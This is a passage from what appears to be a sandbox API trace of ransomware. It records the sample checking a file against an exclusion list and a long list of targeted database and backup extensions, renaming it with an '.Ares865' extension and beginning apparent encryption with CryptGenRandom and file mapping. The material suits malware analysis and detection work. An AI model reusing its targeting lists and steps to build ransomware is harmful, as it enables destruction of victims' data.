nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-UzRn58SF_1E.lnk", cAlternateFileName="-UZRN5~1.LNK")) returned 1 [0092.858] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.858] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="aoldtz.exe") returned 1 [0092.858] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2=".") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="..") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="windows") returned -1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="bootmgr") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="temp") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="pagefile.sys") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="boot") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="ids.txt") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="ntuser.dat") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="perflogs") returned 1 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2="MSBuild") returned 1 [0092.859] lstrlenW (lpString="-UzRn58SF_1E.lnk") returned 16 [0092.859] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-nkAbxRjWZdB18q.lnk") returned 56 [0092.859] lstrcpyW (in: lpString1=0x2cce44a, lpString2="-UzRn58SF_1E.lnk" | out: lpString1="-UzRn58SF_1E.lnk") returned="-UzRn58SF_1E.lnk" [0092.859] lstrlenW (lpString="-UzRn58SF_1E.lnk") returned 16 [0092.859] lstrlenW (lpString="Ares865") returned 7 [0092.859] lstrcmpiW (lpString1="_1E.lnk", lpString2="Ares865") returned -1 [0092.859] lstrlenW (lpString=".dll") returned 4 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2=".dll") returned 1 [0092.859] lstrlenW (lpString=".lnk") returned 4 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2=".lnk") returned 1 [0092.859] lstrlenW (lpString=".ini") returned 4 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2=".ini") returned 1 [0092.859] lstrlenW (lpString=".sys") returned 4 [0092.859] lstrcmpiW (lpString1="-UzRn58SF_1E.lnk", lpString2=".sys") returned 1 [0092.859] lstrlenW (lpString="-UzRn58SF_1E.lnk") returned 16 [0092.859] lstrlenW (lpString="bak") returned 3 [0092.859] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.859] lstrlenW (lpString="ba_") returned 3 [0092.859] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.859] lstrlenW (lpString="dbb") returned 3 [0092.859] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.859] lstrlenW (lpString="vmdk") returned 4 [0092.859] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.859] lstrlenW (lpString="rar") returned 3 [0092.859] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.860] lstrlenW (lpString="zip") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.860] lstrlenW (lpString="tgz") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.860] lstrlenW (lpString="vbox") returned 4 [0092.860] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.860] lstrlenW (lpString="vdi") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.860] lstrlenW (lpString="vhd") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.860] lstrlenW (lpString="vhdx") returned 4 [0092.860] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.860] lstrlenW (lpString="avhd") returned 4 [0092.860] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.860] lstrlenW (lpString="db") returned 2 [0092.860] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.860] lstrlenW (lpString="db2") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.860] lstrlenW (lpString="db3") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.860] lstrlenW (lpString="dbf") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.860] lstrlenW (lpString="mdf") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.860] lstrlenW (lpString="mdb") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.860] lstrlenW (lpString="sql") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.860] lstrlenW (lpString="sqlite") returned 6 [0092.860] lstrcmpiW (lpString1="1E.lnk", lpString2="sqlite") returned -1 [0092.860] lstrlenW (lpString="sqlite3") returned 7 [0092.860] lstrcmpiW (lpString1="_1E.lnk", lpString2="sqlite3") returned -1 [0092.860] lstrlenW (lpString="sqlitedb") returned 8 [0092.860] lstrcmpiW (lpString1="F_1E.lnk", lpString2="sqlitedb") returned -1 [0092.860] lstrlenW (lpString="xml") returned 3 [0092.860] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.860] lstrlenW (lpString="$er") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.861] lstrlenW (lpString="4dd") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.861] lstrlenW (lpString="4dl") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.861] lstrlenW (lpString="^^^") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.861] lstrlenW (lpString="abs") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.861] lstrlenW (lpString="abx") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.861] lstrlenW (lpString="accdb") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accdb") returned 1 [0092.861] lstrlenW (lpString="accdc") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accdc") returned 1 [0092.861] lstrlenW (lpString="accde") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accde") returned 1 [0092.861] lstrlenW (lpString="accdr") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accdr") returned 1 [0092.861] lstrlenW (lpString="accdt") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accdt") returned 1 [0092.861] lstrlenW (lpString="accdw") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accdw") returned 1 [0092.861] lstrlenW (lpString="accft") returned 5 [0092.861] lstrcmpiW (lpString1="E.lnk", lpString2="accft") returned 1 [0092.861] lstrlenW (lpString="adb") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.861] lstrlenW (lpString="adb") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.861] lstrlenW (lpString="ade") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.861] lstrlenW (lpString="adf") returned 3 [0092.861] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.861] lstrlenW (lpString="adn") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.862] lstrlenW (lpString="adp") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.862] lstrlenW (lpString="alf") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.862] lstrlenW (lpString="ask") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.862] lstrlenW (lpString="btr") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.862] lstrlenW (lpString="cat") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.862] lstrlenW (lpString="cdb") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.862] lstrlenW (lpString="ckp") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.862] lstrlenW (lpString="cma") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.862] lstrlenW (lpString="cpd") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.862] lstrlenW (lpString="dacpac") returned 6 [0092.862] lstrcmpiW (lpString1="1E.lnk", lpString2="dacpac") returned -1 [0092.862] lstrlenW (lpString="dad") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.862] lstrlenW (lpString="dadiagrams") returned 10 [0092.862] lstrcmpiW (lpString1="8SF_1E.lnk", lpString2="dadiagrams") returned -1 [0092.862] lstrlenW (lpString="daschema") returned 8 [0092.862] lstrcmpiW (lpString1="F_1E.lnk", lpString2="daschema") returned 1 [0092.862] lstrlenW (lpString="db-journal") returned 10 [0092.862] lstrcmpiW (lpString1="8SF_1E.lnk", lpString2="db-journal") returned -1 [0092.862] lstrlenW (lpString="db-shm") returned 6 [0092.862] lstrcmpiW (lpString1="1E.lnk", lpString2="db-shm") returned -1 [0092.862] lstrlenW (lpString="db-wal") returned 6 [0092.862] lstrcmpiW (lpString1="1E.lnk", lpString2="db-wal") returned -1 [0092.862] lstrlenW (lpString="dbc") returned 3 [0092.862] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.862] lstrlenW (lpString="dbs") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.863] lstrlenW (lpString="dbt") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.863] lstrlenW (lpString="dbv") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.863] lstrlenW (lpString="dbx") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.863] lstrlenW (lpString="dcb") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.863] lstrlenW (lpString="dct") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.863] lstrlenW (lpString="dcx") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.863] lstrlenW (lpString="ddl") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.863] lstrlenW (lpString="dlis") returned 4 [0092.863] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.863] lstrlenW (lpString="dp1") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.863] lstrlenW (lpString="dqy") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.863] lstrlenW (lpString="dsk") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.863] lstrlenW (lpString="dsn") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.863] lstrlenW (lpString="dtsx") returned 4 [0092.863] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.863] lstrlenW (lpString="dxl") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.863] lstrlenW (lpString="eco") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.863] lstrlenW (lpString="ecx") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.863] lstrlenW (lpString="edb") returned 3 [0092.863] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.863] lstrlenW (lpString="epim") returned 4 [0092.863] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.863] lstrlenW (lpString="fcd") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.864] lstrlenW (lpString="fdb") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.864] lstrlenW (lpString="fic") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.864] lstrlenW (lpString="flexolibrary") returned 12 [0092.864] lstrcmpiW (lpString1="n58SF_1E.lnk", lpString2="flexolibrary") returned 1 [0092.864] lstrlenW (lpString="fm5") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.864] lstrlenW (lpString="fmp") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.864] lstrlenW (lpString="fmp12") returned 5 [0092.864] lstrcmpiW (lpString1="E.lnk", lpString2="fmp12") returned -1 [0092.864] lstrlenW (lpString="fmpsl") returned 5 [0092.864] lstrcmpiW (lpString1="E.lnk", lpString2="fmpsl") returned -1 [0092.864] lstrlenW (lpString="fol") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.864] lstrlenW (lpString="fp3") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.864] lstrlenW (lpString="fp4") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.864] lstrlenW (lpString="fp5") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.864] lstrlenW (lpString="fp7") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.864] lstrlenW (lpString="fpt") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.864] lstrlenW (lpString="frm") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.864] lstrlenW (lpString="gdb") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.864] lstrlenW (lpString="gdb") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.864] lstrlenW (lpString="grdb") returned 4 [0092.864] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.864] lstrlenW (lpString="gwi") returned 3 [0092.864] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.865] lstrlenW (lpString="hdb") returned 3 [0092.865] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.865] lstrlenW (lpString="his") returned 3 [0092.865] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.865] lstrlenW (lpString="ib") returned 2 [0092.865] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.865] lstrlenW (lpString="idb") returned 3 [0092.865] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.865] lstrlenW (lpString="ihx") returned 3 [0092.865] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.865] lstrlenW (lpString="itdb") returned 4 [0092.865] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.865] lstrlenW (lpString="itw") returned 3 [0092.865] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.866] lstrlenW (lpString="jet") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.866] lstrlenW (lpString="jtx") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.866] lstrlenW (lpString="kdb") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.866] lstrlenW (lpString="kexi") returned 4 [0092.866] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.866] lstrlenW (lpString="kexic") returned 5 [0092.866] lstrcmpiW (lpString1="E.lnk", lpString2="kexic") returned -1 [0092.866] lstrlenW (lpString="kexis") returned 5 [0092.866] lstrcmpiW (lpString1="E.lnk", lpString2="kexis") returned -1 [0092.866] lstrlenW (lpString="lgc") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.866] lstrlenW (lpString="lwx") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.866] lstrlenW (lpString="maf") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.866] lstrlenW (lpString="maq") returned 3 [0092.866] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.866] lstrlenW (lpString="mar") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.867] lstrlenW (lpString="marshal") returned 7 [0092.867] lstrcmpiW (lpString1="_1E.lnk", lpString2="marshal") returned -1 [0092.867] lstrlenW (lpString="mas") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.867] lstrlenW (lpString="mav") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.867] lstrlenW (lpString="maw") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.867] lstrlenW (lpString="mdbhtml") returned 7 [0092.867] lstrcmpiW (lpString1="_1E.lnk", lpString2="mdbhtml") returned -1 [0092.867] lstrlenW (lpString="mdn") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.867] lstrlenW (lpString="mdt") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.867] lstrlenW (lpString="mfd") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.867] lstrlenW (lpString="mpd") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.867] lstrlenW (lpString="mrg") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.867] lstrlenW (lpString="mud") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.867] lstrlenW (lpString="mwb") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.867] lstrlenW (lpString="myd") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.867] lstrlenW (lpString="ndf") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.867] lstrlenW (lpString="nnt") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.867] lstrlenW (lpString="nrmlib") returned 6 [0092.867] lstrcmpiW (lpString1="1E.lnk", lpString2="nrmlib") returned -1 [0092.867] lstrlenW (lpString="ns2") returned 3 [0092.867] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.867] lstrlenW (lpString="ns3") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.868] lstrlenW (lpString="ns4") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.868] lstrlenW (lpString="nsf") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.868] lstrlenW (lpString="nv") returned 2 [0092.868] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.868] lstrlenW (lpString="nv2") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.868] lstrlenW (lpString="nwdb") returned 4 [0092.868] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.868] lstrlenW (lpString="nyf") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.868] lstrlenW (lpString="odb") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.868] lstrlenW (lpString="odb") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.868] lstrlenW (lpString="oqy") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.868] lstrlenW (lpString="ora") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.868] lstrlenW (lpString="orx") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.868] lstrlenW (lpString="owc") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.868] lstrlenW (lpString="p96") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.868] lstrlenW (lpString="p97") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.868] lstrlenW (lpString="pan") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.868] lstrlenW (lpString="pdb") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.868] lstrlenW (lpString="pdm") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.868] lstrlenW (lpString="pnz") returned 3 [0092.868] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.869] lstrlenW (lpString="qry") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.869] lstrlenW (lpString="qvd") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.869] lstrlenW (lpString="rbf") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.869] lstrlenW (lpString="rctd") returned 4 [0092.869] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.869] lstrlenW (lpString="rod") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.869] lstrlenW (lpString="rodx") returned 4 [0092.869] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.869] lstrlenW (lpString="rpd") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.869] lstrlenW (lpString="rsd") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.869] lstrlenW (lpString="sas7bdat") returned 8 [0092.869] lstrcmpiW (lpString1="F_1E.lnk", lpString2="sas7bdat") returned -1 [0092.869] lstrlenW (lpString="sbf") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.869] lstrlenW (lpString="scx") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.869] lstrlenW (lpString="sdb") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.869] lstrlenW (lpString="sdc") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.869] lstrlenW (lpString="sdf") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.869] lstrlenW (lpString="sis") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.869] lstrlenW (lpString="spq") returned 3 [0092.869] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.869] lstrlenW (lpString="te") returned 2 [0092.869] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.869] lstrlenW (lpString="teacher") returned 7 [0092.869] lstrcmpiW (lpString1="_1E.lnk", lpString2="teacher") returned -1 [0092.869] lstrlenW (lpString="tmd") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.870] lstrlenW (lpString="tps") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.870] lstrlenW (lpString="trc") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.870] lstrlenW (lpString="trc") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.870] lstrlenW (lpString="trm") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.870] lstrlenW (lpString="udb") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.870] lstrlenW (lpString="udl") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.870] lstrlenW (lpString="usr") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.870] lstrlenW (lpString="v12") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.870] lstrlenW (lpString="vis") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.870] lstrlenW (lpString="vpd") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.870] lstrlenW (lpString="vvv") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.870] lstrlenW (lpString="wdb") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.870] lstrlenW (lpString="wmdb") returned 4 [0092.870] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.870] lstrlenW (lpString="wrk") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.870] lstrlenW (lpString="xdb") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.870] lstrlenW (lpString="xld") returned 3 [0092.870] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.870] lstrlenW (lpString="xmlff") returned 5 [0092.870] lstrcmpiW (lpString1="E.lnk", lpString2="xmlff") returned -1 [0092.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-UzRn58SF_1E.lnk.Ares865") returned 61 [0092.871] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-UzRn58SF_1E.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-uzrn58sf_1e.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-UzRn58SF_1E.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-uzrn58sf_1e.lnk.ares865"), dwFlags=0x1) returned 1 [0092.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-UzRn58SF_1E.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-uzrn58sf_1e.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2637) returned 1 [0092.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.872] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.873] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.873] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.873] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd50, lpName=0x0) returned 0x15c [0092.873] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd50) returned 0x190000 [0092.873] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.874] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.874] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.874] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 